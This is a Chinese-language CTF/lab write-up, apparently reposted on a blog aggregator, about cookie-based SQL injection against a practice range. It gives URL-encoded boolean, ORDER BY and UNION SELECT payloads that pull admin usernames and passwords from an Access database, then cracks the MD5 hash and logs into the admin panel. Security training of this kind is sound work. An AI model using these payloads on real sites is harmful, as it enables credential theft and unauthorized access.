cookie注入


靶场地址:http://kypt8004.ia.aqlab.cn/shownews.asp?id=171

在这个靶场的新闻中心中,我们发现url中带有id参数,尝试试探是否存在sql注入,通过在参数后面添加 and 1=1

cookie注入

 

 

这里经过了特殊处理,被过滤了,所以尝试其他突破点,将参数放入cookie中去尝试是否有效:    id = 171%20and%201%3D1

cookie注入

 

 发现页面正常,之后将 id的值改为 171 and 1=2   id = 171%20and%201%3D2

cookie注入

 

 

发现页面出现问题,说明可能存在sql注入,可以尝试判断字段数和回显点
将id的值改为 171 and 1=1 order by 10   —id = 171%20and%201%3D1%20order20%by%2010

cookie注入

 

 

 

本次靶场的数据库为Access数据库,所以需要先猜表名,这里存在表admin,news等
将id 的值改为171 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10 from admin —   id = 171%20and%201%3D2%20union%20all%20select%201%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%20from%20admin

cookie注入

 

 

回显点有 2,3,7,8,9字段位置
接下来猜表中字段,这里我们要的是 admin中的数据,此表中的字段有 username,password
拿到这两个数据
171 and 1=2 union all select 1,username,password,4,5,6,7,8,9,10 from admin
—  id =  171%20and%201%3D2%20union%20all%20select%201%2Cusername%2Cpassword%2c4%2c5%2c6%2c7%2c8%2c9%2c10%20from%20admin

cookie注入

 

 

cookie注入

 

 发现用户名为admin **
密码用md5加密了,所以先进行解密
密码为welcome**
接下来去admin目录拿flag

cookie注入

 

登录:http://kypt8004.ia.aqlab.cn/admin/login.asp  使用  破解的 用户名  和密码登录

 cookie注入

 

 cookie注入

 

    郑重感谢大佬,谢谢

 

原创文章,作者:306829225,如若转载,请注明出处:https://blog.ytso.com/271939.html

(0)
上一篇 2022年7月8日
下一篇 2022年7月8日

相关推荐

发表回复

登录后才能评论